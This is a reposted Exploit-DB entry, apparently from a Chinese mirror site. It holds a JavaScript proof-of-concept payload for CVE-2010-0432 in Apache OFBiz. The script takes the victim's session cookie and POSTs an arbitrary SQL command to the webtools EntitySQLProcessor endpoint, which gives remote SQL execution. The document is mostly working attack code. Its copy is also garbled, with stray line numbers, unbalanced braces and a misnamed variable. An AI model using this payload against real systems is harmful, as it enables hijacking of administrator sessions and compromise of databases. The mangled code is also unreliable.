Apache OFBiz – Remote Execution (via SQL Execution) - 体验盒子

作者： Lucas Apa

日期： 2010-04-16

类别：

remote

平台：

multiple

来源：https://www.exploit-db.com/exploits/12263/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

/*

Apache OFBiz SQL Remote Execution PoC Payload.

CVE: CVE-2010-0432

By: Lucas Apa ( lucas -at- bonsai-sec.com ).

Bonsai Information Security

http://www.bonsai-sec.com/

*/

var cmd = 'command';

var xmlhttp=false;

try {

xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");

} catch (e) {

try {

xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");

} catch (E) {

xmlhttp = false;

}

if (!xmlhttp && typeof XMLHttpRequest!='undefined') {

try {

xmlhttp = new XMLHttpRequest();

} catch (e) {

xmlhttp=false;

}

if (!xmlhttp && window.createRequest) {

try {

xmlhttp = window.createRequest();

} catch (e) {

xmlhttp=false;

}

xmlhttp.open("POST", "

https://192.168.225.135:8443/webtools/control/EntitySQLProcessor",true);

xmlhttp.onreadystatechange=function() {

if (xmlhttp2.readyState==4) {

//alert(xmlhttp.responseText)

}

var cookie = unescape(document.cookie);

xmlhttp.setRequestHeader("content-type",

"application/x-www-form-urlencoded");

xmlhttp.setRequestHeader("cookie", cookie);

var str1 = (<r><![CDATA[submitButton=Enviar&sqlCommand=]]></r>).toString();

var str2 = (<r><![CDATA[&group=org.ofbiz&rowLimit=200]]></r>).toString();

var post_data = str1+cmd+str2;

xmlhttp.send(post_data);